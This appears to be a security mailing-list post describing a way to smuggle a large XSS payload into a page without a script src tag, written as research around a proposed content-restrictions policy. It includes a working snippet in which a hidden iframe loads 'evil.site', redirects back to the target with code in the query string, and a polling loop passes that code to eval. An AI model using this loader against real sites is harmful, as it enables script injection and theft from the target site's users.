Importing large code piece into Javascript context without SCRIPT SRC=...

Hi

Recently, I've been toying with the somewhat academic question of whether it is 
possible to 
"import" a large piece of JS code (to be used as XSS payload), given that a 
script context 
is already available, BUT without using SCRIPT SRC=...
This question is triggered by the "script" keyword of Gervase Markham's 
Content- 
Restrictions suggestion (http://www.gerv.net/security/content-restrictions/).

I came up with a nice idea, which is abusing any manner of loading HTML content 
(such as 
IFRAME, new windows, etc.) as following:
The attacker forces a load from its own website (evil.site), which redirects 
the browser 
back to the original website (say target.site). It needs to do so with a query 
(e.g. 
"?data=..."). This query is the channel through which the JS payload is 
transmitted to the 
malicious bridge-head. In the below example, assume that evil.site/redir.cgi 
simply 
redirects to target.site/index.html?data=...
Note that it may take few seconds for the target.site page to load, and 
meanwhile, the 
script (which runs in the target.site domain) cannot access the IFRAME (which 
initially is 
in evil.site domain). Hence the need for the loop.

<iframe src="http://evil.site/redir.cgi"; width=1 height=1></iframe>
<script>
var tid;
function fetch() 
{
      try
      {
            var data=document.frames[0].location.search.substr(6);
            clearInterval(tid);
            eval(data);
      }
      catch(ex)
      {
      }
}
tid = setInterval('fetch()', 100);
</script>

As you can see, with about 240 bytes, I can force a load of any script code 
through the 
query part, which can host 4KB. And it's easy to do this multiple times.

-Amit